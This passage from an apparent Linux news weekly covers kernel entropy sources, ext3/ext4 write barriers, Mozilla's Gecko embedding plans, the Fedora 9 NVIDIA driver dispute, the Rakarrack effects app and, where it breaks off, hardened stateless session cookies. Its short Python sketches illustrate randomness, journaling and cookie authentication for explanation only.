keep its entropy pool stocked up, which in turn allows processes to use the
strongest random numbers that Linux can provide.  Exactly which events
qualify as random—and just how much randomness they
provide—is sometimes difficult to decide.  A recent move to eliminate
a source of
contributions to the entropy pool has worried some, especially in the embedded
community. 


The kernel samples unpredictable events for use in generating random
numbers, storing that data in the entropy pool.  Entropy is a measure of
the unpredictability or randomness of a data set, so the kernel estimates
the amount of entropy each of those events contributes to the pool.
Many kernels run on hardware that is lacking some of the
traditional sources of entropy. In those cases, the timing of interrupts
from network 
devices has been used as a source of entropy, but it has always been
controversial, so it was recently proposed for removal.


Two of the best sources of random data for the entropy pool—user interaction via a
keyboard or mouse and disk interrupts—are often not present in embedded
devices.  In addition, some disk interfaces, notably ATA, do not add
entropy, which extends the problem to many "headless" servers.  But network
interrupts are seen as a dubious source of entropy because they may be able
to be observed, or manipulated, by an attacker.  In addition, as network
traffic rises, many network drivers turn off receive interrupts from the
hardware, allowing the kernel to poll periodically for incoming packets.
This would reduce entropy collection just at the time when it might be needed for
encrypting the traffic. 


This is not the first time eliminating the IRQF_SAMPLE_RANDOM flag
from network drivers has come up; we looked at the issue two years
ago (though the flag was called SA_SAMPLE_RANDOM at that time).
It has come up again, starting with a  query on linux-kernel from
Chris Peterson: "Should network devices be allowed to contribute
entropy to /dev/random?"  Jeff Garzik, kernel network device driver
maintainer, answered: "I tend to push people to /not/ add
IRQF_SAMPLE_RANDOM to new drivers, 
but I'm not interested in going on a pogrom with existing code."


For anyone that is interested in such a pogrom, Peterson proposed a
patch to 
eliminate the flag from the twelve network drivers that still use it.
This sparked a long discussion on how to provide entropy for those devices
that do not have anything else to use.  While the actual contribution of
entropy from network devices is questionable, mixing that data into the
pool does not harm it, as long as no entropy credit—the current
estimate of entropy in the pool—is awarded.
Alan Cox proposed a new flag to track sources
like that:

A more interesting alternative might be to mark things like network
drivers with a new flag say IRQF_SAMPLE_DUBIOUS so that users can be
given a switch to enable/disable their use depending upon the environment.


Some were in favor of an approach like this, but Adrian Bunk notes that: 

If he can live with dubious data he can simply use /dev/urandom .

If a customer wants to use /dev/random and demands to get dubious data
there if nothing better is available fulfilling his wish only moves
the security bug from his crappy application to the Linux kernel.


Part of the problem stems from a misconception about random numbers
gotten from /dev/random versus those that are read from
/dev/urandom, which we described in a Security page
article last December. In general, applications should read from
/dev/urandom.  Only the most sensitive uses of random
numbers—keys for GPG for example—need the entropy guarantee
that /dev/random provides.  In a system that is getting regular
entropy updates, the quality of the random numbers from both sources is the same.
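
For ordinary application needs, then, the non-blocking source is the one to
use.  As a small illustration (a sketch, not a recommendation for any
particular program), Python's os.urandom() returns bytes from the kernel's
non-blocking random source; the helper name below is invented for the
example.

```python
import os


def random_token(nbytes=16):
    """Return nbytes of kernel-provided randomness as a hex string."""
    return os.urandom(nbytes).hex()


if __name__ == "__main__":
    print(random_token())
```

A call like this never waits for the entropy estimate to rise, which is
exactly the behavior most applications want.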


There is still an initialization problem for some systems, though, as Ted
Ts'o points out:

Hence, if you don't think the system hasn't run long enough to collect
significant entropy, you need to distinguish between "has run long
enough to collect entropy which is causes the entropy credits using a
somewhat estimation system where we try to be conservative such that
/dev/random will let you extract the number of bits you need", and
"has run long enough to collect entropy which is unpredictable by an
outside attacker such that host keys generated by /dev/urandom really
are secure".


A potential entropy source, even for embedded systems, is to sample
other kernel and system parameters that are not predictable externally.
Garzik suggests: 


EGD demonstrates this, for example:  http://egd.sourceforge.net/  It
looks at snmp, w, last, uptime, iostats, vmstats, etc.

And there are plenty of untapped entropy sources even so, such as reading
temperature sensors, fan speed sensors on variable-speed fans, etc.

Heck, "smartctl -d ata -a /dev/FOO" produces output that could be hashed
and added as entropy.


Another source is hardware random number generators.  The kernel
already has support for some, including the VIA
Padlock that seems to be well thought of.  Not all processors have such
support, however. The Trusted
Platform Module (TPM) does have random number generation and is
becoming more widespread, especially in laptops, but there is no kernel
hw_random driver for TPM.


Garzik advocates adding a kernel driver for what he calls the "Treacherous
Platform Module", but as others pointed out, it can all be done in user
space using the TrouSerS
library.  Even for the hardware random number generators that are supported
in the kernel there is no automatic entropy collection, as it is left up to
user space to decide whether to do that.  This is done to try and keep
policy decisions about the quality of the random data out of kernel code.


Systems that wish to sample that data should use rngd to feed the
kernel entropy pool.  rngd will apply FIPS 140-2 tests to
verify the randomness of the data before passing it to the kernel.  Andi
Kleen is not in favor of that approach:

Just think a little bit: system has no randomness source except the
hardware RNG. you do your strange randomness verification. if it fails
what do you do? You don't feed anything into your entropy pool and all
your  random output is predictable (just boot time)  If you add anything
predictable from another source it's still predictable, no difference.


There is concern that some of the hardware random number generators are
poorly implemented or could malfunction, so it would be dangerous to
automatically add that data into the pool.  Doing the FIPS testing in the
kernel is not an option, leaving it up to user space applications to make
the decision.  There is nothing stopping any superuser process from adding bits
to the entropy pool—no matter how weak—but the consensus is that the
kernel itself must use sources it knows it can trust.
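
To give a sense of what such user-space testing involves, here is a sketch of
the simplest of the FIPS 140-2 statistical tests, the monobit test.  It
assumes the 20,000-bit block size and the acceptance bounds from the original
FIPS 140-2 text, which should be checked against the standard before being
relied upon; it is not rngd's code, and rngd applies further tests beyond
this one.

```python
def monobit_ok(block: bytes) -> bool:
    """Monobit test: the count of 1 bits in 20,000 bits must be near 10,000."""
    if len(block) != 2500:
        raise ValueError("the test is defined on 20,000 bits (2500 bytes)")
    ones = sum(bin(byte).count("1") for byte in block)
    # Bounds assumed from the original FIPS 140-2 statistical tests.
    return 9725 < ones < 10275
```

A stuck-at-zero generator fails immediately, but a perfectly predictable
pattern such as repeated 0x55 bytes passes; a test like this catches gross
malfunctions, not a lack of unpredictability.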


Another instance of this problem—in a different guise—appears in a discussion about random numbers for virtualized I/O, with Garzik asking: "Has anyone yet written a "hw" RNG
module for virt, that reads the host's
random number pool?"  Rusty Russell responded with a patch for a virtio "hardware"
random number generator as well as one that adds it into his lguest 
hypervisor.  The lguest patch reads data from the host's
/dev/urandom, 
which is not where H. Peter Anvin thinks it
should come from:

There is no point in feeding the host /dev/urandom to the guest (except
for seeding, which can be handled through other means); it will do its
own mixing anyway.  The reason to provide anything at all from the host
is to give it "golden" entropy bits.


The virtio implementation only provides the hw_random
implementation, thus it requires user space help to get entropy data into
the kernel.  Much like any process that can read /dev/random,
lguest could exhaust the host entropy pool, so there was some discussion of
limiting how much random data guests can request from the device.  A guest
implementation could then use a small pool of entropy read from the host to
seed its own random number generator for the simulated hardware device.


Removing the last remaining uses of IRQF_SAMPLE_RANDOM in network
drivers seems likely, though some way to mix that data into the entropy
pool without giving it any credit is still a possibility.  With luck, that
will encourage more effort into incorporating new sources of entropy using
tools like EGD or, for systems that have it available, random number
hardware.  For systems that lack the traditional entropy sources, this
should lead to a better initialized and fuller pool, while eliminating a
potential attack by way of network packet manipulation.
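
The idea of mixing data into the pool without awarding credit can be shown
with a toy model.  The Python sketch below is an illustration only: the class
is invented, SHA-256 is used as a convenient mixing function, and the
kernel's real pool is built quite differently.

```python
import hashlib


class ToyPool:
    """Toy entropy pool: mixing always changes the state, credit is separate."""

    def __init__(self):
        self._state = bytes(32)
        self.credit_bits = 0      # the estimate of entropy in the pool

    def mix(self, data: bytes, credit_bits: int = 0):
        # Hash the old state together with the new sample.
        self._state = hashlib.sha256(self._state + data).digest()
        self.credit_bits += credit_bits


if __name__ == "__main__":
    pool = ToyPool()
    pool.mix(b"network interrupt timing")          # dubious source: no credit
    pool.mix(b"keyboard interrupt timing", 4)      # trusted source: some credit
    print(pool.credit_bits)
```

Samples from a dubious source still stir the pool, but only sources that are
trusted raise the estimate that governs how much /dev/random will hand out.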


		Barriers and journaling filesystems


Journaling filesystems come with a big promise: they free system
administrators from the need to worry about disk corruption resulting from
system crashes.  It is, in fact, not even necessary to run a filesystem
integrity checker in such situations.  The real world, of course, is a
little messier than that.  As a recent discussion shows, it may be even
messier than many of us thought, with the integrity promises of
journaling filesystems being traded off against performance.


A filesystem like ext3 works by maintaining a journal on a dedicated
portion of the disk.  Whenever a set of filesystem metadata changes are to
be made, they are first written to the journal - without changing the rest
of the filesystem.  Once all of those changes have been journaled, a
"commit record" is added to the journal to indicate that everything else
there is valid.  Only after the journal transaction has been committed in
this fashion can the kernel  do the real metadata writes at its leisure;
should the system crash in the middle, the information needed to safely
finish the job can be found in the journal.  There will be no filesystem
corruption caused by a partial metadata update.  

There is a hitch, though: the filesystem code must, before writing the
commit record, be absolutely sure that all of the transaction's information
has made it to the journal.  Just doing the writes in the proper order is
insufficient; contemporary drives maintain large internal caches and will
reorder operations for better performance.  So the filesystem must
explicitly instruct the disk to get all of the journal data onto the media
before writing the commit record; if the commit record gets written first,
the journal may be corrupted.  The kernel's block I/O subsystem makes this
capability available through the use of barriers; in essence, a barrier forbids the
writing of any blocks after the barrier until all blocks written before the
barrier are committed to the media.  By using barriers, filesystems can
make sure that their on-disk structures remain consistent at all times.
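
The failure mode, and the way a barrier prevents it, can be sketched with a
toy model of a drive that has a write cache.  Everything in this Python
example is invented for illustration (the class, the block numbers, and the
deliberately hostile "flush in reverse order" behavior); it says nothing
about how real drives or the block layer are implemented.

```python
class ToyDisk:
    """A drive with a volatile write cache that may reorder pending writes."""

    def __init__(self):
        self.media = {}    # block number -> data that reached the platter
        self.cache = []    # pending (block, data) writes, not yet durable

    def write(self, block, data):
        self.cache.append((block, data))

    def barrier(self):
        # Everything queued before the barrier reaches the media first.
        for block, data in self.cache:
            self.media[block] = data
        self.cache.clear()

    def crash(self, survivors):
        # Hostile case: the cache is written out in reverse order and only
        # 'survivors' writes land before the power goes away.
        for block, data in list(reversed(self.cache))[:survivors]:
            self.media[block] = data
        self.cache.clear()


LOG_BLOCKS = [0, 1, 2]
COMMIT_BLOCK = 3


def run_transaction(disk, use_barrier):
    for block in LOG_BLOCKS:
        disk.write(block, "log")
    if use_barrier:
        disk.barrier()
    disk.write(COMMIT_BLOCK, "commit")


def journal_consistent(media):
    """A commit record is only trustworthy if every log block is present."""
    if COMMIT_BLOCK not in media:
        return True    # an uncommitted transaction is simply ignored
    return all(block in media for block in LOG_BLOCKS)


def crash_test(use_barrier):
    disk = ToyDisk()
    run_transaction(disk, use_barrier)
    disk.crash(survivors=1)
    return journal_consistent(disk.media)
```

Without the barrier, the commit record can reach the media while the log
blocks do not, so crash_test(False) reports an inconsistent journal; with the
barrier in place, crash_test(True) reports a consistent one.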


There is another hitch: the ext3 and ext4 filesystems, by default, do not
use barriers.  The option is there, but, unless the administrator has
explicitly requested the use of barriers, these filesystems operate
without them - though some distributions (notably SUSE) change that default.
Eric Sandeen recently decided that this was not the best situation, so he
submitted a patch changing
the default for ext3 and ext4.  That's when the discussion started.

Andrew Morton's response tells a lot about
why this default is set the way it is:


	Last time this came up lots of workloads slowed down by 30% so I
	dropped the patches in horror.  I just don't think we can quietly
	go and slow everyone's machines down by this much...
	
	There are no happy solutions here, and I'm inclined to let this dog
	remain asleep and continue to leave it up to distributors to decide
	what their default should be.


So barriers are disabled by default because they have a serious impact on
performance.  And, beyond that, the fact is that people get away with
running their filesystems without using barriers.  Reports of ext3
filesystem corruption are few and far between.

It turns out that the "getting away with it" factor is not just luck.  Ted
Ts'o explains what's going on: the journal
on ext3/ext4 filesystems is normally contiguous on the physical media.  The
filesystem code tries to create it that way, and, since the journal is
normally created at the same time as the filesystem itself, contiguous
space is easy to come by.  Keeping the journal together will be good for
performance, but it also helps to prevent reordering.  In normal usage, the
commit record will land on the block just after the rest of the journal
data, so there is no reason for the drive to reorder things.  The commit
record will naturally be written just after all of the other journal log
data has made it to the media.

That said, nobody is foolish enough to claim that things will always happen
that way.  Disk drives have a certain well-documented tendency to stop
cooperating at inopportune times.  Beyond that, the journal is essentially
a circular buffer; when a transaction wraps off the end, the commit record
may be on an earlier block than some of the journal data.  And so on.  So
the potential for corruption is always there; in fact, Chris Mason has a torture-test program which can make it happen
fairly reliably.  There can be no doubt that running without barriers is
less safe than using them.


Anybody can turn on barriers if they are willing to take the performance
hit.  Unless, of course, their filesystem is based on an LVM volume (as
certain distributions set things up by default); it turns out that the device mapper
code does not pass through or honor barriers.  But, for everybody else, it
would be nice if that 
performance cost could be reduced somewhat.  And it seems that might be
possible.


The current ext3 code - when barriers are enabled - performs a sequence of
operations like this for each transaction:


 1. The log blocks are written to the journal.
 2. A barrier operation is performed.
 3. The commit record is written.
 4. Another barrier is executed.
 5. Metadata writes begin at some later point.


On ext4, the first barrier (step 2) can be omitted because the ext4
filesystem supports checksums on the journal.  If the journal log data and
the commit record are reordered, and if the operation is interrupted by a
crash, the journal's checksum will not match the one stored in the commit
record and the transaction will be discarded.  Chris Mason suggests that it would be "mostly safe" to
omit that barrier with ext3 as well, with a possible exception when the
journal wraps around.
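
The checksum idea can be sketched as follows.  This Python example uses
zlib.crc32 purely as a stand-in; it makes no claim about the checksum or the
on-disk layout that ext4 actually uses, and the function names are invented.

```python
import zlib


def make_commit(log_blocks):
    """Checksum over all log blocks, as it would be stored in the commit record."""
    crc = 0
    for block in log_blocks:
        crc = zlib.crc32(block, crc)
    return crc


def transaction_valid(blocks_on_media, commit_crc):
    """At recovery time, replay only if the log matches the commit record."""
    return make_commit(blocks_on_media) == commit_crc


if __name__ == "__main__":
    log = [b"inode update", b"bitmap update"]
    commit = make_commit(log)
    # After a crash, the second log block never made it to the media intact.
    damaged = [log[0], b"bitmap updatX"]
    print(transaction_valid(log, commit), transaction_valid(damaged, commit))
```

If the commit record lands before some of the log data, recovery sees a
mismatch and discards the transaction rather than replaying garbage, which is
why the first barrier becomes unnecessary.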


Another idea for making things faster is to defer barrier operations when
possible.  If there is no pressing need to flush things out, a few
transactions can be built up in the journal and all shoved out with a
single barrier.  There is also some potential for improvement by carefully
ordering operations so that barriers (which are normally implemented as
"flush all outstanding operations to media" requests) do not force the
writing of blocks which do not have specific ordering requirements.
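
As a rough illustration of the deferral idea, the toy model below counts barriers issued for a stream of transactions.  Everything in it is hypothetical (the Journal class, the batch_size parameter, the "urgent" flag), and it charges one barrier per flush rather than the two that ext3 currently uses per transaction; the point is only the arithmetic of batching.

```python
class Journal:
    """Toy journal that counts how many barriers (cache flushes) it issues."""

    def __init__(self, batch_size=1):
        self.batch_size = batch_size  # hypothetical tunable
        self.pending = []             # committed, but not yet forced to media
        self.durable = []             # known to be on the media
        self.barriers = 0

    def commit(self, transaction, urgent=False):
        self.pending.append(transaction)
        # An urgent commit (fsync(), say) cannot wait for the batch to fill.
        if urgent or len(self.pending) >= self.batch_size:
            self.flush()

    def flush(self):
        if not self.pending:
            return
        self.barriers += 1
        self.durable.extend(self.pending)
        self.pending.clear()

def run(batch_size, count=12):
    journal = Journal(batch_size)
    for n in range(count):
        journal.commit(f"txn-{n}")
    journal.flush()  # force out whatever is left at the end
    return journal.barriers

eager = run(1)     # one barrier per transaction: 12
deferred = run(4)  # four transactions per barrier: 3
print(eager, deferred)
```

The cost of deferral is visible in the model as well: anything still sitting in "pending" at the time of a crash is lost, which is why an urgent commit has to force a flush.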


In summary: it looks like the time has come to figure out how to make the
cost of barriers palatable.  Ted Ts'o seems to
feel that way:


	I think we have to enable barriers for ext3/4, and then work to
	improve the overhead in ext4/jbd2.  It's probably true that the
	vast majority of systems don't run under conditions similar to what
	Chris used to demonstrate the problem, but the default has to be
	filesystem safety.


Your editor's sense is that this particular
dog is now wide awake and is likely to bark for some time.  That may
disturb some of the neighbors, but it's better than letting somebody get
bitten later on.

		Mozilla looks to simplify embedding


There has been a longstanding complaint about the difficulty in embedding
Mozilla into other applications, but an effort is underway to change that.
Mozilla evangelist Christopher Blizzard is coordinating a group of
interested developers to redefine the application programming interfaces
(APIs), libraries, and 
embedding "story" to try to make it easier for other applications.  Mozilla
is leading the way, but they want to build a community around embedding, so
they are reaching out to developers that wish to
help guide the effort.  


Embedding the Gecko
rendering engine—the guts of Mozilla's web 
content handling—will allow separate programs to deal with and use
the web without writing the code themselves.  New applications can
leverage all of the work done by Mozilla to handle HTML, CSS, Javascript,
etc. to concentrate on their specific task.  There are several embedding use
cases cited on the Mozilla wiki, but the focus of this new effort has
been on applications where handling web content is just part of the task at
hand. 


To some extent, this effort is probably being
driven by the rise of
WebKit, which has a specific focus on being embeddable.
WebKit is derived from the KHTML rendering engine—which underlies
Konqueror—as modified by Apple for their Safari browser.  There has
been a fair amount of press about WebKit lately, which, along with the
defection of the Epiphany browser from Gecko to WebKit, may have given
Mozilla more motivation to make Gecko more embeddable. 


Two meetings have occurred so far to discuss and plan a strategy for
providing better embedding support.  Blizzard has a lengthy report from the
first 
which goes into some detail about the direction they are headed.  The other
was held in early
May, but there are no reports from that as yet.  This is a young project
that is looking for more interested folks to get involved.


One of the larger complaints about trying to embed Gecko into other
applications is that there are multiple ways to do it.  It is difficult for
a developer to know which is right for their application.  Blizzard says:


Sometimes you use libxul, sometimes you use the win32 embedding widget,
sometimes you use the gtk embedding widget, sometimes you have to reach
down into internal interfaces to change things and some times you
don't. Having a single story around how to make use of the embedding APIs
on your platform and in your environment is one of our goals.


Another area that needs work is providing a stable API.  One of the
downsides to not having stability at the API or application binary
interface (ABI) is that security holes in Gecko tend to cascade throughout all the
other applications that use it.  But Blizzard does not expect to nail down
the API right away:

So we will have some iteration during early development and will start
locking things down once we have a better sense of what people [want] and what
we'll need to change internally once we understand about our user's
specific use cases. Stable API is a goal, but it's a longer goal. The more
that we have people help us understand and contribute code out of the gate
the faster we will get here. 


The diagram at right gives an overview of how the new API will fit.  There
is existing code at both the top and bottom of the diagram, while most of
the middle is new.  Applications will be able to use some of the
embedded functionality through platform-specific APIs—for GNOME,
Windows, or OS X—or write directly to
the new embedding APIs for more capabilities.  One of the more interesting
decisions is to use the existing APIs as a model, but not for creating a
fully compatible implementation.  Blizzard
explains:

Note that trying to be a drop in replacement to WebKit or MSHTML/WebBrowser
Control is not on the table. Therein lies madness. You end up chasing
compatibility instead of just trying to make something that works really
really well. But we can learn what works well from them and what doesn't
and hopefully apply that to our new embedding interfaces.


The project has started on a roadmap of features that need to be worked on,
beginning with the basics.  Reorganizing the libraries and header files to
create a software development kit (SDK) is high on that list.  One of the
bigger issues that needs to be addressed is how to handle profiles—the
directory (i.e. $HOME/.mozilla) that Mozilla uses for
user-specific data storage.  Some use cases will want to run without a
profile, but the current code expects to always have one available.  The
full list in the meeting report is worth a read.


This is an interesting project that should lead to more interesting
applications down the road.  The barriers to working with Gecko today are 
fairly high, but the advantages to using a well-tested, well-supported,
and reasonably fast rendering
engine for applications that need it are compelling.  Those barriers look
to be lowering in the not-too-distant future.


		Blame Fedora.  Again.


As your editor writes, the Fedora development list is the scene of an
extended, heated discussion about Fedora 9.  One might think that some
users would be unhappy about the inclusion of KDE 4, say, or maybe
it's an issue with Firefox 3, with its refusal to run older extensions
and persistent fsync() bug.
It would not be hard to imagine users being upset by the continued presence
of Codeina.  In fact, nobody seems to have much to say about those issues.
Instead, a small group of very vocal users is complaining about the X
Window System.


That, too, might not be completely beyond imagination.  Your editor can
certainly attest that Rawhide users had more than their share of X-related
fun over the course of the Fedora 9 development cycle.  The
interesting thing, though, is that just about all of the problems reported
by Rawhide users got fixed before the final release.  So, while
Fedora 9 has a lot of very new X infrastructure, it seems to be
fairly solid infrastructure.


The problem, instead, is that NVIDIA has not shipped a version of its
binary-only graphics driver which works on Fedora 9.  These vocal
users feel that the Fedora Project has done them a major disservice by
shipping a release without an NVIDIA-compatible X server.  Instead, they
say, Fedora should either have declined to ship a "pre-release" server, or
it should provide a separate set of packages with an older server for
NVIDIA users.  NVIDIA seems
to agree:


	Fedora 9 is shipping a pre-release X server. If you can't wait for
	an updated NVIDIA graphics driver and the limited support provided
	in 173.08 graphics driver release is insufficient for your
	purposes, please use the X.Org nv driver or fall back to a
	supported distribution.


There are a few responses to be made to this set of claims, starting with
the "pre-release" bit.  The server is only "pre-release" by a relatively
short period of time, and, more importantly, the ABI for this server
release has been frozen for a few months now.  The X developers have made
it clear that the ABI will not change before the 1.5 release ships.  So
there's no real reason why NVIDIA could not release a driver if it chose to
do so.

But NVIDIA has not so chosen.  More to the point, NVIDIA has implemented a
clear policy of not releasing drivers for a given X version until that
version appears in a stable release by a major distribution.  This is a
policy which forces some distributor to ship a version of X which is not
supported by NVIDIA.  Criticizing a distribution like Fedora for being the
first one out with a new X version seems misplaced; if one is averse to the
use of new software, there are probably better distributions to be running.

But what about the compatibility packages request?  Beyond the inconvenient
fact that putting resources into supporting proprietary software is contrary
to Fedora's policies, that sort of support is expensive to provide.  See Adam Jackson's response for a blunt summary of
just how expensive.  If Fedora developers start putting their time into
that sort of project, they will be putting less time into making Fedora
itself better.  This does not seem like a good tradeoff for Fedora users
who, after all, have chosen a distribution with a "100% free software"
policy. 

And, certainly, some Fedora users appreciate the priorities that the developers
have taken:


	Well I'm an Intel & Radeon user and Xorg in F9 is dramatically
	better better for all my machines. So, yes, if new code improves
	life for the open source drivers, lets do this again & again in
	future releases. I don't want my desktop experience held hostage by
	one company with binary drivers.


In fact, X has gotten significantly better, and it has gotten better more
quickly as a result of Fedora's decision to go with the upcoming release.
Any attempt to maintain compatibility with proprietary drivers would, at
best, slow that progress down significantly.

Users unquestionably have the right to hook binary-only drivers into their
systems.  But ensuring that those drivers work with current free software
is their problem - not the free software developers' problem.  The use of
proprietary software may have some advantages for some people, but it does
put users at the mercy of the only people who can fix or update that
software: the software's owner.  Most developers (most!) do not overtly
wish to make life 
difficult for users of binary drivers.  But asking them to go out of their
way to shield binary driver users from the decisions made by their vendors
is not just excessive; it actively risks making things worse for free
software users.

Anybody who wants to criticize Fedora can certainly find any number of
valid things to gripe about.  Your editor would start with the two
obnoxious PackageKit icons which materialized on the GNOME panel, and
which, it seems, cannot be made to go away without the application of a
fair amount of dynamite.  Why does a Rawhide user need a constant reminder
that there are updates available?  But the failure to provide an
NVIDIA-compatible X server does not seem like an appropriate thing to
complain about.  One should not blame Fedora for being free software.

		Use Rakarrack for Electric Guitar Effects


Rakarrack
is a new GUI-based application that can turn a Linux machine into
a collection of audio effects for use in the making of music.
The developers include Josep Andreu, Daniel Vidal and
Hernán Ordiales with help from other individuals.
Rakarrack version 0.1.2 was recently
announced;
it appears to be the first public release.
From the project's web page:


Rakarrack is a guitar effects processor for GNU / Linux simple and easy to use but it contains features that make it unique in this field of applications. It contains 10 effects: Linear Equalizer, Parametric Equalizer, Compressor, Distorsion, Overdrive, Echo, Chorus, Phaser, Flanger and Reverb. It integrates a tuner and a MIDI converter (experimental). It can also be handled by an external MIDI controller. The settings designed by the user can be stored in presets and these presets can be used to create banks of effects.


The README file in the source code has some information on the
motivation behind the project:
"This app born after an informal conversation about effects for guitar
over GNU/linux. The major part of this apps are discontinued or simply
not have new versions after few years. Josep Andreu say on the IRC chat
"I can made an app based on the effects set hid[d]en on code of
ZynAddSubFX (by Paul Nasca Octavian). Some time after here is the
result of our work..."


The project
screen shots show the GUI layout and various color schemes.
Compared to a typical hardware audio processor, the GUI has big
advantages over the usual LCD display that most effect units have.
One need not hunt around a pushbutton-controlled memory to view and
change the many adjustable parameters and the system disk provides
nearly unlimited configuration storage possibilities.
To hear Rakarrack in action, listen to the
demo
by Carlos Pino (ogg format).


One might wonder if audio effects processors will soon follow
mobile phones, TiVo-like video recorders and consumer-based audio
recorders in the transition from proprietary operating systems to
Linux-based embedded systems.
Such a system could be put together with a small Linux-compatible
embedded platform, an LCD interface such as
LCDproc
(with the aforementioned UI limitations),
keyboard and audio interfaces and some DSP software similar to
Rakarrack.  In the meantime, if you have a need for a versatile
hardware effector and can spare some CPU cycles, Rakarrack may be
an effective solution.  The software is available for download
here.


		Session cookies for web applications


Two weeks ago on this page, we reported on some WordPress
vulnerabilities that were caused by incorrectly generating
authentication cookies.  The article was a bit light on details about such
cookies, so this follow-up hopes to remedy that.  In addition, Steven
Murdoch, who discovered both of the holes, recently presented
a paper on a new cookie technique that provides some additional
safeguards over other schemes.


HTTP is a stateless protocol, which means that any application that wishes
to track multiple requests as a single session must provide its own way to
link those requests.  This is typically done through cookies, which are
opaque blobs of data that are stored by browsers.  Cookies are sent to the
browser as part of an HTTP response, usually after some kind of
authentication is successful.  The browser associates the cookie with the
URL of the site so that it can send the cookie value back to the server on
each subsequent request.   


Servers can then use the value as a key into some kind of persistent
storage so that all requests that contain that cookie value are treated as
belonging to a particular session.  In particular, it represents that the
user associated with that session has correctly authenticated.
The cookie lasts until it expires or is
deleted by the user.  When that happens, the user must re-authenticate to
get a new cookie which also starts a new session.  Users find this annoying
if it happens too frequently, so expirations are often quite long.


If the user explicitly logs out of the application, any server-side
resources that are being used to store state information can be freed, but
that is often not the case.  Users will generally just close their browser (or
tab) while still being logged in.  It is also convenient for users to be
allowed multiple concurrent sessions, generally from multiple computers,
which will cause the number of sessions stored to be larger, perhaps much
larger, than the number of users.


Applications could restrict the number of sessions allowed by a user, or
ratchet the expiration value way down, but they typically do not for user
convenience.  This allows for a potential denial of service when an
attacker creates so many sessions that the server runs out of persistent
storage.  For this reason, stateless
session cookies [PDF] were created.  


Stateless session cookies store all of the state information in the cookie
itself, so that the server need not keep anything in the database,
filesystem, or memory.  The data in the cookie must be encoded in such a
way that they cannot be forged, otherwise attackers could create cookies
that allow them access they should not have.  This is essentially where
WordPress went wrong.  Because it did not implement stateless session
cookies correctly, a valid cookie for one user could be
modified into a valid cookie for a different user. 


A stateless session cookie has the state data and expiration "in the clear"
followed by a secure hash (SHA-256 for example) of those same values along
with a key known only by the server.  When the server receives the cookie
value, it can calculate the hash and if it matches, proceed to use the
state information.  Because the secret is not known to the attacker, they
cannot create their own cookies with values of their choosing.
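
A minimal sketch of such a cookie follows.  It makes some assumptions which are not in the description above: the field layout and the "|" separator are invented for illustration, the key is a placeholder, and it uses HMAC-SHA-256 from the standard library rather than a bare hash of the values concatenated with the key, since HMAC is the usual way to build a keyed hash.

```python
import hashlib
import hmac
import time

SERVER_KEY = b"example-key-known-only-to-the-server"  # placeholder value

def make_cookie(state, expires, key=SERVER_KEY):
    """State and expiration in the clear, followed by a keyed hash of both."""
    payload = f"{state}|{expires}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"

def check_cookie(cookie, key=SERVER_KEY, now=None):
    """Return the state if the cookie is authentic and unexpired, else None."""
    try:
        state, expires, tag = cookie.rsplit("|", 2)
        expiry = int(expires)
    except ValueError:
        return None  # wrong number of fields or a non-numeric expiration
    payload = f"{state}|{expires}"
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison, so the check does not leak how much matched.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    if (time.time() if now is None else now) >= expiry:
        return None
    return state

cookie = make_cookie("user=alice", expires=2_000_000_000)
good = check_cookie(cookie, now=1_000_000_000)
forged = check_cookie(cookie.replace("alice", "admin"), now=1_000_000_000)
expired = check_cookie(cookie, now=2_000_000_000)
print(good, forged, expired)
```

Changing "alice" to "admin" invalidates the keyed hash, which is precisely the property a correct implementation needs: one user's valid cookie cannot be edited into another user's.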


The other side of that coin is that an attacker can create spoofed
cookies if they know the secret.  Murdoch wanted to extend the concept such
that even getting access to the secret, through a SQL injection or other
web application flaw, would not feasibly allow an attacker to create a
spoofed cookie.  The result is hardened
stateless session cookies [PDF].


The basic idea behind the scheme is to add an additional field to stateless
session cookies that corresponds to an authenticator generated when an
account is first set up.  This authenticator is generated from the password
at account creation by iteratively
calculating the cryptographic hash of the password and a long salt
value.  


Salt is a random string (usually just a few characters long) that is added to a password before it gets hashed,
then stored in the clear alongside the resulting hash.  It is used to eliminate the use of rainbow tables to crack
passwords.  Hardened stateless session cookies use a 128-bit
salt value, then repeatedly calculate HASH(prev|salt), where
prev 
is the password the first time through and the hash value from the previous
calculation on each subsequent iteration.


The number of iterations is large, 256 for example, but not a secret.  Once
that value is calculated, it is hashed one last time, without the salt, and
then stored in the user table as the authenticator.  When the cookie value
is created after a successful authentication, only the output of the
iterative hash itself is placed in the cookie, not the authenticator that
is stored in the database.  Cookie verification then must do the standard
stateless session cookie hash verification, to ensure that the values have
not been manipulated, then hash the value in the
cookie to verify against the authenticator in the database.
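
The authenticator calculation can be sketched as follows.  This is a reading of the description above and not code from Murdoch's paper: the function names and the dictionary standing in for a row of the user table are invented, and "prev|salt" is taken to mean simple concatenation.  The keyed hash over the whole cookie, which the scheme still requires, is left out to keep the example short.

```python
import hashlib
import hmac
import os

ITERATIONS = 256  # large, but not a secret

def iterated_hash(password, salt, iterations=ITERATIONS):
    """Repeatedly compute HASH(prev|salt), starting from the password."""
    prev = password.encode()
    for _ in range(iterations):
        prev = hashlib.sha256(prev + salt).digest()
    return prev

def create_account(password):
    """Build the (hypothetical) user table row for a new account."""
    salt = os.urandom(16)  # 128-bit salt
    # One final hash, without the salt, yields the stored authenticator.
    authenticator = hashlib.sha256(iterated_hash(password, salt)).digest()
    return {"salt": salt, "authenticator": authenticator}

def verify_cookie_value(record, cookie_value):
    """Hash the value carried in the cookie and compare with the database."""
    digest = hashlib.sha256(cookie_value).digest()
    return hmac.compare_digest(digest, record["authenticator"])

def login(record, password):
    """Return the value to place in the cookie, or None on a bad password."""
    candidate = iterated_hash(password, record["salt"])
    return candidate if verify_cookie_value(record, candidate) else None

record = create_account("correct horse")
value = login(record, "correct horse")
print(value is not None, login(record, "wrong guess") is None)

# Somebody who has read the user table holds only the authenticator, which
# does not work as a cookie value; they would need its SHA-256 preimage.
print(verify_cookie_value(record, record["authenticator"]))
```

The cookie carries the output of the iteration, while the database holds only the hash of that output, so reading the database does not yield anything that can be placed in a cookie.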


If it sounds complicated, it is; the performance of doing 256 hashes is
also an issue, but it does protect against the secret key being leaked.
Because an attacker cannot calculate a valid authenticator value to put
in the cookie (doing so would require breaking SHA-256), they cannot create
their own spoofed cookies. 


While it is not clear that the overhead of all of these hash calculations
